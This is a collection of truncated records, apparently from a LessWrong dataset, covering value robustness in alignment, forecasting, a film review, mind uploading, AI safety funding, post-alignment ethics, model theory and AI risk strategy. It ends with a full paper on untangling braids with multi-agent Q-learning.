2. More strongly, we would be "happy" (were we fully informed) for the system to optimise for these points
The above claims specify different dimensions of "robustness". Questions about robustness should be understood as asking about all of them.
---
Why Does it Matter?
===================
The degree to which values are robust seems to be very relevant from an AI existential safety perspective.
* The more robust values are, the more likely we are to get [alignment by default](https://www.lesswrong.com/posts/Nwgdq6kHke5LY692J/alignment-by-default) (and vice versa).
* The more robust values are, the easier it is to target AI systems at ideal values (and vice versa).
+ Such targeting is one approach to solve the alignment problem[[5]](#fn708ty5ja7a7)
+ If values are insufficiently robust, then [value learning](https://www.lesswrong.com/tag/value-learning) may not be viable at all
- Including approaches like RHLF, CIRL/DIRL, etc.
- It may not be feasible to train a system to optimise for suitable targets
---
Questions
=========
A. What's the best/most compelling evidence/arguments in favour of robust values?
B. What's the best/most compelling evidence/arguments against robust values?
C. To what degree do you think values are robust?
I am explicitly soliciting opinions, so do please answer even if you do not believe your opinion to be particularly informed.
1. **[^](#fnref9jcddbn79a4)**Using the shard theory conception of "value" as "contextual influence on decision making".
2. **[^](#fnrefdzq2mb4spjb)**To be clear, "example operationalisation" in this document does not refer to any kind of canonical formalisations. The example operationalisations aren't even necessarily correct/accurate/sensible. They are meant to simply gesture in the right direction for what those terms might actually cash out to.
3. **[^](#fnrefhxfnro75cc)**"Benevolent": roughly the subset of human values that we are happy for arbitrarily capable systems to optimise for.
"Universal": roughly the subset of human values that we are happy for other humans to optimise for.
4. **[^](#fnrefyv07rz4tpq)**Including "[astronomical waste](https://nickbostrom.com/astronomical/waste)" as an existential catastrophe.
5. **[^](#fnref708ty5ja7a7)**The other approach being to safeguard systems that may not necessarily be optimising for values that we'd be "happy" for them to pursue, were we fully informed.
Examples of safeguarding approaches: corrigibility, impact regularisation, myopia, non-agentic system design, quantilisation, etc. |
e3a1dc98-177a-4fce-b120-0080a82aa099 | trentmkelly/LessWrong-43k | LessWrong | The Walking Dead
Information asymmetry is a funny thing.
A while ago I created a question asking "Will NASA return a sample of material from the surface of Mars to Earth before SpaceX Starship lands on Mars?". Currently the odds according to the Metaculus prediction are that there's an 80% chance Starship will land on Mars before the sample-return mission is complete. How different would NASA's Mars exploration program look if everyone working there believed this to be the case? What if every American believed this to be the case?
Now Metaculus could be wrong of course, but its predictions are historically well-calibrated and it has a track-record of beating the experts (for example on covid-19). That means anyone--and specifically anyone reading this post--has access to information that while not "secret" is hardly general knowledge.
Other than writing dire letters to NASA about how SLS is a waste of money because it is likely to manage only about 2 launches prior to 2030, what can you do with this information?
Consider Metaculus' prediction that the first AGI will be created around 2052. Or the fact that there is a 30% chance of China annexing Taiwan in the same time frame? Or that there is a 50% chance another cryptocurrency will eclipse Bitcoin by 2026?
Here is the point: many future changes are highly predictable, but people for the most part go about their lives acting as though things will continue more or less the way they always have. Don't be that way! Imagine you were born with a superpower that gave you prophetic insight into the future. It wouldn't just be dumb to ignore that power, it would borderline reprehensible. We have a moral obligation to warn the world around us about the changes that are coming.
To warn them that they are the walking dead.
P.S.
It would be really cool to create a project that studies on which topics Metaculus disagrees most with the average expert (or the average member of the public) and somehow systematically make use of |
a3354da5-e7fa-4ad3-929a-949915903796 | trentmkelly/LessWrong-43k | LessWrong | [Review] Edge of Tomorrow (2014)
This post contains spoilers for Edge of Tomorrow (2014) and All You Need is Kill (2004).
Spoiler-Free tl;dr
Watch Edge of Tomorrow up until the scene at the dam. Skip the rest of the film and read All You Need is Kill instead.
Spoilerific Review
Edge of tomorrow is Groundhog Day (1993) except instead of taking place in a small town in the 90s it takes places on the Invasion of Normandy in a future war against aliens.
Act 1
In the first scene, Tom Cruise goes through his day normally. He dies and comes back to life. He relives the same day over and over until he gets used to how the time loop works. At the end of Act 1, Tom Cruise discovers that war heroine Emily Blunt used to have the time travel power too and they team up.
Act 2
Emily Blunt trains Tom Cruise to fight. They fight the aliens over and over again, getting a little better each time.
Act 3
In Act 3 Tom Cruise loses his time travel power. Together, he and Emily Blunt have only one shot to kill the boss alien.
Act 1 and Act 2 make sense. They're structurally identical to Groundhog Day. But Act 3 is awful. This is a time travel movie. In Act 3 there's no time travelling! It turns into a generic action flick.
What happened?
All You Need is Kill
Edge of Tomorrow was originally based on the Japanese light novel All You Need is Kill. Act 1 and Act 2 are the same. I hypothesize Act 3 was modified for American audiences.
In All You Need is Kill, Emily Blunt never loses her time travelling power. She fights alongside Tom Cruise as an equal. They kill the boss alien together.
But the story doesn't end there.
In All You Need is Kill there is a detailed explanation about how the time travel works. To escape each time loop our heroes need to kill the alien loopers, leaving only themselves. But since both Tom Cruise and Emily Blunt are both loopers, only one of them can escape the final time loop. One of them has to die.
So at the end of the story there's a big epic duel to the death between o |
8edeec28-b3e6-4f26-b218-2c48a96a3767 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Continuity in Uploading
I don't acknowledge an upload as "me" in any meaningful sense of the term; if I copied my brain to a computer and then my body was destroyed, I still think of that as death and would try to avoid it.
A thought struck me a few minutes ago that seems like it might get around that, though. Suppose that rather than copying my brain, I adjoined it to some external computer in a kind of reverse-[Ebborian](/lw/ps/where_physics_meets_experience/) act; electrically connecting my synapses to a big block of computrons that I can consciously perform I/O to. Over the course of life and improved tech, that block expands until, as a percentage, most of my thought processes are going on in the machine-part of me. Eventually my meat brain dies -- but the silicon part of me lives on. I think I would probably still consider that "me" in a meaningful sense. Intuitively I feel like I should treat it as the equivalent of minor brain damage.
Obviously, one could shorten the period of dual-life arbitrarily and I can't point to a specific line where expanded-then-contracted-consciousness turns into copying-then-death. The line that immediately comes to mind is "whenever I start to feel like the technological expansion of my mind is no longer an external module, but the main component," but that feels like unjustified punting.
I'm curious what other people think, particularly those that share my position on destructive uploads.
---
Edited to add:
Solipsist asked me for the [reasoning behind my position](/r/discussion/lw/jip/continuity_in_uploading/aea6) on destructive uploads, which led to this additional train of thought:
Compare a destructive upload to non-destructive. Copy my mind to a machine non-destructively, and I still identify with meat-me. You could let machine-me run for a day, or a week, or a year, and only then kill off meat-me. I don't like that option and would be confused by someone who did. Destructive uploads feel like the limit of that case, where the time interval approaches zero and I am killed and copied in the same moment. As with the case outlined above, I don't see a crossed line where it stops being death and starts being transition.
An expand-contract with interval zero is effectively a destructive upload. So is a copy-kill with interval zero. So the two appear to be mirror images, with a discontinuity at the limit. Approach destructive uploads from the copy-then-kill side, and it feels clearly like death. Approach them from the expand-then-contract side, and it feels like continuous identity. Yet at the limit between them they turn into the same operation. |
3a5bec56-5111-4fb0-9937-aff0e05dfecd | trentmkelly/LessWrong-43k | LessWrong | How to turn money into AI safety?
Related: Suppose $1 billion is given to AI Safety. How should it be spent? , EA is vetting-constrained, What to do with people?
I
I have heard through the grapevine that we seem to be constrained - there's money that donors and organizations might be happy to spend on AI safety work, but aren't because of certain bottlenecks - perhaps talent, training, vetting, research programs, or research groups are in short supply. What would the world look like if we'd widened some of those bottlenecks, and what are local actions that people can do to move in that direction? I'm not an expert either from the funding or organizational side, but hopefully I can leverage Cunningham's law and get some people more in the know to reply in the comments.
Of the bottlenecks I listed above, I am going to mostly ignore talent. IMO, talented people aren't the bottleneck right now, and the other problems we have are more interesting. We need to be able to train people in the details of an area of cutting-edge research. We need a larger number of research groups that can employ those people to work on specific agendas. And perhaps trickiest, we need to do this within a network of reputation and vetting that makes it possible to selectively spend money on good research without warping or stifling the very research it's trying to select for.
In short, if we want to spend money, we can't just hope that highly-credentialed, high-status researchers with obviously-fundable research will arise by spontaneous generation. We need to scale up the infrastructure. I'll start by taking the perspective of individuals trying to work on AI safety - how can we make it easier for them to do good work and get paid?
There are a series of bottlenecks in the pipeline from interested amateur to salaried professional. From the the individual entrant's perspective, they have to start with learning and credentialing. The "obvious path" of training to do AI safety research looks like getting a bachelor's or PhD i |
c4ad8e47-8fd8-4fe4-a8c5-0ebded310612 | trentmkelly/LessWrong-43k | LessWrong | [LINK] Climate change and food security
A Guardian article on the impact of climate change on food security. This is worrying (albeit perhaps not a global catastrophic (or existential) risk). It has the potential to wipe out the gains made against extreme poverty in the last few decades.
Should we be so pessimistic? Climate change might be averted through government action or a technological fix; or the poorest might get rich enough to be protected from this insecurity; or we could see a second 'Green Revolution' with GM, etc. I've also seen some discussion that climate change could in fact increase food cultivation - in Russia and Canada for example.
How do people feel about this - optimistic or pessimistic? |
b7a66e45-ed6c-43b7-9275-a4299aaf49a4 | trentmkelly/LessWrong-43k | LessWrong | AI Risk and Opportunity: A Strategic Analysis
Suppose you buy the argument that humanity faces both the risk of AI-caused extinction and the opportunity to shape an AI-built utopia. What should we do about that? As Wei Dai asks, "In what direction should we nudge the future, to maximize the chances and impact of a positive intelligence explosion?"
This post serves as a table of contents and an introduction for an ongoing strategic analysis of AI risk and opportunity.
Contents:
1. Introduction (this post)
2. Humanity's Efforts So Far
3. A Timeline of Early Ideas and Arguments
4. Questions We Want Answered
5. Strategic Analysis Via Probability Tree
6. Intelligence Amplification and Friendly AI
7. ...
Why discuss AI safety strategy?
The main reason to discuss AI safety strategy is, of course, to draw on a wide spectrum of human expertise and processing power to clarify our understanding of the factors at play and the expected value of particular interventions we could invest in: raising awareness of safety concerns, forming a Friendly AI team, differential technological development, investigating AGI confinement methods, and others.
Discussing AI safety strategy is also a challenging exercise in applied rationality. The relevant issues are complex and uncertain, but we need to take advantage of the fact that rationality is faster than science: we can't "try" a bunch of intelligence explosions and see which one works best. We'll have to predict in advance how the future will develop and what we can do about it.
Core readings
Before engaging with this series, I recommend you read at least the following articles:
* Muehlhauser & Salamon, Intelligence Explosion: Evidence and Import (2013)
* Yudkowsky, AI as a Positive and Negative Factor in Global Risk (2008)
* Chalmers, The Singularity: A Philosophical Analysis (2010)
Example questions
Which strategic questions would we like to answer? Muehlhauser (2011) elaborates on the following questions:
* What methods can we use to predict tec |
92220b9a-b8e2-465a-9360-91c8ffbef886 | trentmkelly/LessWrong-43k | LessWrong | Endo-, Dia-, Para-, and Ecto-systemic novelty
[Metadata: crossposted from https://tsvibt.blogspot.com/2023/01/endo-dia-para-and-ecto-systemic-novelty.html. First completed January 10, 2023. This essay is more like research notes than exposition, so context may be missing, the use of terms may change across essays, and the text might be revised later; only the versions at tsvibt.blogspot.com are definitely up to date.]
Novelty can be coarsely described as one of: fitting within a preexisting system; constituting a shift of the system; creating a new parallel subsystem; or standing unintegrated outside the system.
Thanks to Sam Eisenstat for related conversations.
Novelty is understanding (structure, elements) that a mind acquires (finds, understands, makes its own, integrates, becomes, makes available for use to itself or its elements, incorporates into its thinking). A novel element (that is, structure that wasn't already there in the mind fully explicitly) can relate to the mind in a few ways, described here mainly by analogy and example. A clearer understanding of novelty than given here might clarify the forces acting in and on a mind when it is acquiring novelty, such as "value drives".
Definitions
"System" ("together-standing") is used here to emphasize the network of relations between elements of a mind.
These terms aren't supposed to be categories, but more like overlapping regions in the space of possibilities for how novelty relates to the preexisting mind.
Endosystemic novelty (or "basis-aligned" or "in-ontology") is novelty that is integrated into the mind by fitting alongside and connecting to other elements, in ways analogous to how preexisting elements fit in with each other. Endosystemic novelty is "within the system"; it's within the language, ontology, style of thinking, conceptual scheme, or modus operandi of the preexisting mind.
Diasystemic novelty (or "cross-cutting" or "basis-skew" or "ontological shift") is novelty that is constituted as a novel structure of the mind by many shi |
b6e83a38-d5a0-473d-ae7d-cace2dd73666 | trentmkelly/LessWrong-43k | LessWrong | Mental Context for Model Theory
I'm reviewing the books on the MIRI course list. After my first four book reviews I took a week off, followed up on some dangling questions, and upkept other side projects. Then I dove into Model Theory, by Chang and Keisler.
It has been three weeks. I have gained a decent foundation in model theory (by my own assessment), but I have not come close to completing the textbook. There are a number of other topics I want to touch upon before December, so I'm putting Model Theory aside for now. I'll be revisiting it in either January or March to finish the job.
In the meantime, I do not have a complete book review for you. Instead, this is the first of three posts on my experience with model theory thus far.
This post will give you some framing and context for model theory. I had to hop a number of conceptual hurdles before model theory started making sense — this post will contain some pointers that I wish I'd had three weeks ago. These tips and realizations are somewhat general to learning any logic or math; hopefully some of you will find them useful.
Shortly, I'll post a summary of what I've learned so far. For the casual reader, this may help demystify some heavily advanced parts of the Heavily Advanced Epistemology sequence (if you find it mysterious), and it may shed some light on some of the recent MIRI papers. On a personal note, there's a lot I want to write down & solidify before moving on.
In follow-up post, I'll discuss my experience struggling to learn something difficult on my own — model theory has required significantly more cognitive effort than did the previous textbooks.
Between what was meant and what was said
Model theory is an abstract branch of mathematical logic, which itself is already too abstract for most. So allow me to motivate model theory a bit.
At its core, model theory is the study of what you said, as opposed to what you meant. To give some intuition for this, I'll re-tell an overtold story about an ancient branch of math.
In |
bece90c7-dc55-46ce-916a-01f43da06e59 | trentmkelly/LessWrong-43k | LessWrong | After Alignment — Dialogue between RogerDearnaley and Seth Herd
RogerDearnaley
Hi Seth! So, what did you want to discuss?
Seth Herd
I'd like to primarily discuss your AI, Alignment and Ethics sequence. You made a number of points that I think LWers will be interested in. I'll try to primarily act as an interviewer, although I do have one major and a number of minor points I'd like to get in there. I'm hoping to start at the points that will be of most interest to the most people.
RogerDearnaley
Sure, I'm very happy to talk about it. For background, that was originally world-building thinking that I did for a (sadly still unpublished) SF novel-trilogy that I worked on for about a decade, starting about 15 years ago, now rewritten in the format of Less Wrong posts. The novel was set far enough in the future that people clearly had AI and had long since solved the Alignment Problem, so I needed to figure out what they had then pointed the AIs at. So I had to solve ethics :-)
Seth Herd
Okay, right. That's how I read it: an attempt to make an ethical system we'd want if we achieved ASI alignment.
RogerDearnaley
Yeah, that was basically the goal. Which required me to first figure out how to think about ethics without immediately tripping over a tautology.
Seth Herd
It had a number of non-obvious claims. Let me list a few that were of most interest to me:
1. It's not a claim about moral realism. It's a claim about what sort of ethical system humans would want, extending into the future.
2. In this system, AIs and animals don't get votes. Only humans do.
3. Uploads of human minds only get one vote per original human.
RogerDearnaley
Some of these properties were also deeply inobvious to me too: I wrote for several years assuming that the AIs had moral weight/rights/votes, in fact greater than the humans, in proportion to the logarithm of their intelligence (roughly log parameter count), before finally realizing that made no sense, because if they were fully aligned they wouldn't want moral weight/etc, and would have rather limi |
66424b93-a58c-411c-9dfa-5e91b9ea82c6 | StampyAI/alignment-research-dataset/arxiv | Arxiv | Untangling Braids with Multi-agent Q-Learning
I Introduction
---------------
Braids are mathematical objects from low-dimensional topology which can be successfully encoded with sequences of letters and, therefore, studied using algebra or, as we do in this study, using some computer-scientific approach. A braid on $n$ strands consists of $n$ ropes whose left-hand ends are fixed one under another and whose right-hand ends are fixed one under another; you can imagine that the braid is laid out on a table, and the ends of the ropes are attached to the table with nails. Figures 1, 2, 3 show examples of braids on 3 strands.
Figure 1: Braid $aabaBBAB$
Figure 2: Braid $baBABaBb$
Two braids are *equivalent* to one another if they can be transformed into one another by shifting and twisting the middle parts of the ropes (without touching the ends of the ropes). For example, the two braids in Figures 1, 2 are equivalent to one another, although it is difficult to see it. They are also what is called *trivial* braids, in the sense that they are equivalent to the braid without any intersections of ropes, shown in Figure 3.
Figure 3: The trivial braid without intersections
Now let us explain how braids can be represented conveniently in the computer. A braid is considered as a sequence of its simple fragments; for braids on 3 strands, these are the fragments shown in Figure 4, which we denote by $A, a, B, b, 1$ (and which in mathematical papers are usually denoted by $\sigma_1, \sigma_1^{-1}, \sigma_2, \sigma_2^{-1}, 1$).
Figure 4: Braid fragments $A, a, B, b, 1$
Using this convenient notation, we can now say that the braids in Figures 1, 2 are $aabaBBAB$ and $baBABaBb$. This notation is useful not only for describing braids, but also for checking if two braids are equivalent. Indeed, it is known that two braids are equivalent if and only if one can be transformed to the other using rules called the second Reidemeister move and the third Reidemeister move.
The *second Reidemeister move* is the rule stating that $Aa$ and $aA$ are equivalent to $11$, and $Bb$ and $bB$ are also equivalent to $11$. (An algebraist studying braids in the context of group theory would also add that $11$ is equivalent to $1$; however, we felt that the performance of our AI will be best if we omit this non-essential rule.) The *third Reidemeister move* is the rule stating that $ABA$ is equivalent to $BAB$.
Our general aim is to produce tangled braids and to untangle braids using reinforcement learning (RL). A recent study [[9](#bib.bib9)] uses RL to untangle knots using a version of Reidemeister moves known as Markov moves. The novelty of our approach is the use of two agents: one for tangling and one for untangling.
In this pilot study we concentrate on braids with 2 and 3 strands. For braids with 2 strands the problem is equivalent to simplifying words in a group given by the presentation $\langle a, b \mid ab = ba = 1 \rangle$. In our experiments we choose to use the moves which preserve the length of the braid; for example, $ab$ simplifies to $11$ and not $1$. We approach the problem of untangling braids with two strands as a symbol game. The input string of length $n$ consists of 3 symbols: ['a', 'b', '1']. The task of the untangling agent is to convert the string to have all characters as '1' (the untangled state).
Following are the allowed moves: $1a = a1$; $1b = b1$; $ab = ba = 11$. (In another experiment we used the moves $1a = a1$; $1b = b1$; $aa = bb = 11$, corresponding to the group $\langle a, b \mid aa = bb = 1 \rangle$.)
All such moves are implemented in both directions.
We also experimented with braids with three strands, where the following transformations are allowed: $Aa = aA = 11$; $Bb = bB = 11$; $A1 = 1A$; $a1 = 1a$; $B1 = 1B$; $b1 = 1b$. We approach the problem of untangling braids on 3 strands as a game played between two players, player 1 (the tangling player) and player 2 (the untangling player). Player 1 starts with an untangled braid as in Figure 3 and applies Reidemeister moves to tangle the braid. For example, the braids in Figures 1, 2 were produced by player 1 after approximately 150 games against player 2. Once player 1 has created a tangled braid after a fixed number of steps, that braid is the input for player 2 (the untangling player); the task of player 2 is to apply Reidemeister moves to reach a fixed target output, namely all 1's (the untangled state).
In our experiment we approach the problem of untangling braids on 2 and 3 strands by simply using the Q-learning algorithm. Q-learning, starting from the current state of the agent, finds an optimal policy in the sense of maximizing the expected value of the total rewards [[11](#bib.bib11)]. To implement the Q-learning algorithm, we use OpenAI Gym [[3](#bib.bib3)]. It is an interface which provides a number of environments in which to implement reinforcement learning problems. The benefit of interfacing with OpenAI Gym is that it is an actively developed interface which allows adding environments and features useful while training the model.
The paper is organized as follows: in the following section we discuss the background, covering the basics of Reinforcement Learning with a focus on a technique known as Q-learning. In Section 3, we briefly review the concept of OpenAI Gym and how we have used it for our problem. In Section 4, we present the experimental details and results.
II Background
--------------
In this section we formally highlight the important concepts for the understanding and development of the project, and also highlight some of the relevant work in the domain of reinforcement learning specifically for games.
Reinforcement learning is the training of machine learning models to make a sequence of decisions, where the agent learns to achieve a goal in an uncertain, potentially complex environment[[10](#bib.bib10)]. In RL, there is a game-like situation, where the computer employs trial and error to come up with a solution to the problem. Basically, during the whole learning process, the agent gets either rewards or penalties for the actions it performs. The overall goal is to maximize the total rewards.
We have used a model-free reinforcement learning algorithm known as Q-learning [[14](#bib.bib14)]. It is an off-policy algorithm to determine the best action in the current state. Off-policy means that the agent, rather than following certain rules of behavior, can take random actions; the best action is the one assumed to result in the highest reward; the current state is the present situation the agent resides in. Basically, there exists a system of rewards used to build a matrix of scores for each possible move, known as the Q-matrix.
What Q-learning does is measure how good a state-action combination is in terms of rewards. It does so by keeping track of a Q-matrix, a reference matrix which gets updated after each episode, with its rows corresponding to states and its columns to actions. An episode ends after a set of actions is completed. The Q-matrix is updated using a mathematical formula known as the Bellman equation.
$$
\underbrace{Q^{\mathrm{new}}(s,a)}_{\text{new Q-value}}
= \underbrace{Q(s,a)}_{\text{current Q-value}}
+ \underbrace{\alpha}_{\text{learning rate}}
\Bigl[\,\underbrace{R(s,a)}_{\text{reward}}
+ \underbrace{\gamma}_{\text{discount rate}}
\,\underbrace{\max_{a'} Q(s',a')}_{\substack{\text{maximum predicted reward, given}\\ \text{new state and all possible actions}}}
- Q(s,a)\Bigr]
$$
In the above equation the first term, $Q(s,a)$, is the value of the current action in the current state; $\alpha$ is the learning rate, which controls how much of the difference between the previous and new Q-value is taken into account; $\gamma$ is the discount factor, used to balance immediate and future reward. The updates occur after each step or action and end when an episode is done (the terminal point is reached). The agent will not learn much from a single episode, but eventually, with enough exploration (steps and episodes), the Q-values will converge and the agent will learn the optimal ones.
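A minimal tabular implementation of this update might look as follows; this is a sketch under our own assumptions, and the state/action counts are illustrative choices matching the 2-strand environment described below, not the authors' code.

```python
import numpy as np

# Tabular Q-learning update implementing the Bellman equation above.
ALPHA = 0.1   # learning rate (illustrative value)
GAMMA = 0.9   # discount factor (illustrative value)

def q_update(Q: np.ndarray, s: int, a: int, r: float, s_next: int) -> None:
    """Update Q[s, a] after taking action a in state s, receiving
    reward r and observing next state s_next."""
    td_target = r + GAMMA * np.max(Q[s_next])  # best predicted future reward
    Q[s, a] += ALPHA * (td_target - Q[s, a])

# Example: 9 states (aa, bb, ab, ba, a1, 1a, 1b, b1, 11) and an
# illustrative set of 7 actions.
Q = np.zeros((9, 7))
q_update(Q, s=0, a=3, r=1.0, s_next=8)
```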
RL has had extensive success in complex control environments like Atari games [[13](#bib.bib13)] and Sokoban planning [[4](#bib.bib4)]. It is also applied to games with real-time strategy (RTS), such as bots [[15](#bib.bib15)]; another reinforcement-learning-based approach [[1](#bib.bib1)] chooses from a set of predefined strategies in turn-based strategy games. In such approaches the training process is separated into several stages, each of them responsible for different aspects of the game (such as combat, movement and exploration). Other works in strategic fighting games [[7](#bib.bib7), [2](#bib.bib2)] map the possible states of the game based on low-level formations, such as the distance between the fighters and health points. The reward functions used are simple: a positive reward is granted every time the agent strikes the opponent and a negative reward is given when the agent gets hit. A very recent study [[9](#bib.bib9)] introduced natural language processing into the study of knot theory, and they also utilize reinforcement learning (RL) to find sequences of moves and braid relations that simplify knots and can identify unknots by explicitly giving the sequence of actions. Another study [[8](#bib.bib8)] proposed HULK, a perception-based system that untangles dense overhand and figure-eight knots in linear deformable objects from RGB observations. It exploits geometry at local and global scales and learns to model only task-specific features, instead of performing full state estimation, to enable fine-grained manipulation.
III OpenAI Gym
---------------
Recent advances in RL combine Deep Learning (DL) with RL (Deep Reinforcement Learning) and have shown that model-free optimization, or policy gradients, can be used for complex environments [[14](#bib.bib14)]. However, in order to continue testing new ideas and increasing the quality of results, the research community needs good benchmark platforms. This is the main goal of the OpenAI Gym platform [[3](#bib.bib3)]. It is basically a toolkit used for developing and testing reinforcement learning algorithms. One of the encouraging aspects of choosing OpenAI Gym is that it makes no assumptions about the structure of the agent, and has compatibility with any numerical computation library, such as Theano or Google's TensorFlow. Gym is a library which contains a collection of test problems, known as environments, which can be used for testing reinforcement learning algorithms. It also allows users to design their own customized environments. A commonality in all of reinforcement learning is an agent situated in an environment. In each step, the agent takes an action and as a result receives an observation and a reward from the environment. What makes OpenAI Gym unique is how it focuses on the episodic setting of reinforcement learning, where the agent's action chains are broken down into a sequence of episodes. Each episode begins by randomly sampling the agent's initial state and continues until the environment reaches a terminal state. The purpose of structuring reinforcement learning into episodes like these is to maximize the expected total reward per episode, and to reach a high level of performance in as few episodes as possible.
### III-A Environment Set-up for our problem
To use the Q-learning algorithm, it is necessary to set up the environment, which defines all the possible actions and states of the agent. These states must encode useful information for the learning process. In our case of braids with two strands the following states are observed: (aa, bb, ab, ba, a1, 1a, 1b, b1, 11). The agent remains in the same state until a legal action takes place. All the legal actions are described in the *Introduction* section of the paper. For braids with 2 and 3 strands we basically have a caret which moves back and forth over the string. Each position of the caret corresponds to a specific state, and that state only changes after some legal action takes place. For the case of braids with 2 strands, the caret reads two characters at a time, whereas for the case with 3 strands the caret reads three characters at a time across the whole string, so the state space is also larger.
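To give a flavour of what such an environment looks like in code, here is a skeletal sketch using the classic (pre-0.26) Gym API. The observation encoding, action count, and starting word are our illustrative assumptions, not the authors' implementation; the move application inside `step()` is deliberately stubbed out.

```python
import gym
from gym import spaces

class BraidEnv(gym.Env):
    """Sketch of a 2-strand braid-untangling environment."""
    STATES = ["aa", "bb", "ab", "ba", "a1", "1a", "1b", "b1", "11"]

    def __init__(self, length: int = 8):
        self.length = length
        # Illustrative action set: caret left, caret right, rotate, replace.
        self.action_space = spaces.Discrete(4)
        self.observation_space = spaces.Discrete(len(self.STATES))
        self.word = ["1"] * length
        self.caret = 0

    def _obs(self) -> int:
        # The observation is the pair of characters under the caret.
        pair = "".join(self.word[self.caret:self.caret + 2])
        return self.STATES.index(pair)

    def reset(self):
        self.word = list("ab" * (self.length // 2))  # illustrative tangled start
        self.caret = 0
        return self._obs()

    def step(self, action: int):
        reward = 0.0
        # ...apply the chosen move at the caret and set the reward
        # according to Table I (omitted in this sketch)...
        done = all(c == "1" for c in self.word)
        return self._obs(), reward, done, {}
```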
### III-B Action Space and Rewards
Table I shows the rewards associated with each action for braids with 2 and 3 strands. As we have already discussed, all actions that bring us closer to the target output have higher rewards, and all actions which take us away from the target output have lower rewards.
| Action | Reward |
| --- | --- |
| CARET\_MOVE | 0 |
| ROTATE\_TRUE | 0 |
| ROTATE\_FALSE | 0 |
| REPLACE\_TRUE | 1 |
| REPLACE\_BACK | -2 |
| REPLACE\_FALSE | -1 |
| ROTATE\_REPLACE | 1 |
TABLE I: Reward associated for each action
For the case of braids with 2 strands, there are certain actions such as action_replace, which replaces ($ab$ to $11$, $ba$ to $11$), and action_replace_back, which replaces ($11$ to $ab$, $11$ to $ba$). Whereas action_rotate moves the position of the string, e.g., ($1a$ to $a1$, $1b$ to $b1$) and vice versa. action_move_caret(left/right) moves the caret to the left or right. The reward associated with action_replace true is 1, action_replace false is $-1$, the reward for action_replace_back is $-2$, action_rotate_replace is 1, and for all other actions the reward is 0.
Similarly, for the other case where we have braids with 3 strands, action_replace replaces ($Aa$ to $11$, $aA$ to $11$, $Bb$ to $11$, $bB$ to $11$); action_replace_back replaces ($11$ to $Aa$, $11$ to $aA$, $11$ to $Bb$, $11$ to $bB$); action_rotate_replace moves the position of the strings ($ABA$ to $BAB$, $BAB$ to $ABA$); action_rotate moves the position of the strings ($aA$ to $Aa$, $Aa$ to $aA$, $bB$ to $Bb$, $Bb$ to $bB$). The choice of the reward selection is inspired by a few of the works recently published [[5](#bib.bib5), [12](#bib.bib12)].
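Inside the environment's `step()` this schedule can be kept as a simple lookup; the snippet below (ours) just transcribes Table I.

```python
# Reward schedule from Table I, keyed by action outcome.
REWARDS = {
    "CARET_MOVE": 0,
    "ROTATE_TRUE": 0,
    "ROTATE_FALSE": 0,
    "REPLACE_TRUE": 1,
    "REPLACE_BACK": -2,
    "REPLACE_FALSE": -1,
    "ROTATE_REPLACE": 1,
}
```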
IV Experiments
---------------
Untangling of braids requires the implementation of the Q-learning algorithm discussed in Section 2. To measure the performance of the Q-learning model, we utilize the metrics provided by the OpenAI Gym interface, namely rewards over episodes of a particular environment. Separate experiments were performed for different environments. The choice of hyper-parameters was informed by some of the work in the literature [[6](#bib.bib6)]. In the environment where we consider braids with 2 strands, we have a single agent which performs a series of actions during training to untangle the braid. We observe during the training process that inside each episode the agent starts with random actions to untangle the braid, and finally over time learns the right actions to reach the target output. It can be observed, looking at Figures 5, 6 for different lengths of the input, that negative rewards are quite prominent if we train the model for a smaller number of episodes, and the agent hardly learns; whereas the episode rewards progressively increase over time and ultimately level out at a high reward-per-episode value from episode 4000 onwards, which indicates that the agent learns to maximize its total reward earned over time.
In the multi-agent scenario, where we consider braids with 3 strands, in each episode the first agent, for the given length of the input, tries to tangle the braid during the fixed number of defined steps, applying the transformations discussed in Section 1; that tangled state is the input for the second agent, which applies the same transformations to untangle the braid. We approach the problem as a competitive game between two players (player 1 = tangling player, player 2 = untangling player). It is observed from Table II that for a smaller number of training episodes and a larger length of the input the probability of the tangling player winning the game is higher, whereas when we train the system for a higher number of episodes the untangling player wins the game more often at the end of training. Figures 1, 2 show examples of hard tangled braids produced by player 1 after 150 episodes.
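The following sketch (ours, with simplifications: both players act randomly rather than from learned Q-matrices, and each player applies the rules in one direction only) shows the shape of one such two-player game.

```python
import random

# Length-preserving rules for 3 strands, as listed in the Introduction.
RULES3 = [("Aa", "11"), ("aA", "11"), ("Bb", "11"), ("bB", "11"),
          ("A1", "1A"), ("a1", "1a"), ("B1", "1B"), ("b1", "1b")]

def random_move(word: str, reverse: bool) -> str:
    """Apply one randomly chosen rule somewhere in the word, if any applies.
    reverse=True rewrites right-to-left (tangling), else left-to-right."""
    options = []
    for i in range(len(word) - 1):
        for lhs, rhs in RULES3:
            src, dst = (rhs, lhs) if reverse else (lhs, rhs)
            if word[i:i + 2] == src:
                options.append(word[:i] + dst + word[i + 2:])
    return random.choice(options) if options else word

def play_episode(n: int = 8, tangle_steps: int = 20,
                 untangle_steps: int = 100) -> str:
    word = "1" * n                            # player 1 starts from the trivial braid
    for _ in range(tangle_steps):             # phase 1: player 1 tangles
        word = random_move(word, reverse=True)
    for _ in range(untangle_steps):           # phase 2: player 2 untangles
        word = random_move(word, reverse=False)
        if set(word) == {"1"}:
            return "untangler wins"
    return "tangler wins"

print(play_episode())
```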
[Figure 5: Plots of rewards (Rw) over training episodes (Ep) for n=7 and n=8; both panels at 1000 episodes.]
[Figure 6: Plots of rewards (Rw) over training episodes (Ep) for n=7 and n=8; panels at 1000 and 10000 episodes respectively.]
| Input length | ep=1000, steps=20 | ep=10000, steps=20 | ep=1000, steps=100 | ep=10000, steps=100 |
| --- | --- | --- | --- | --- |
| 7 | 40% | 81.7% | 46.2% | 66.6% |
| 8 | 30.7% | 85% | 48.6% | 85% |
| 9 | 29.4% | 87.2% | 42.7% | 75.8% |
| 10 | 24.9% | 72.9% | 36.3% | 84.9% |
| 11 | 24.8% | 72.3% | 32.7% | 60.9% |

TABLE II: Probability of player 2 winning the game (ep = episodes).
V Conclusion
-------------
In this pilot study we successfully conducted several experiments using the Q-learning algorithm to untangle braids with 2 and 3 strands. The problem of untangling braids with 2 strands was approached as a rule-based task, where the agent learns the right rules to untangle the braid over time. The problem of untangling braids with 3 strands was instead approached as a competitive game between two players, where the first agent starts with a fixed-length input and applies the rules to tangle the braid; that tangled braid is the input for the second agent, which applies the rules to untangle it, and if the second agent successfully untangles the braid it wins the round. We observe that the more we train the model, the higher the probability of the second agent winning the game. In the future we intend to approach the same problem using a DQN (Deep Q-learning Network) to compare the results with the Q-learning approach. |
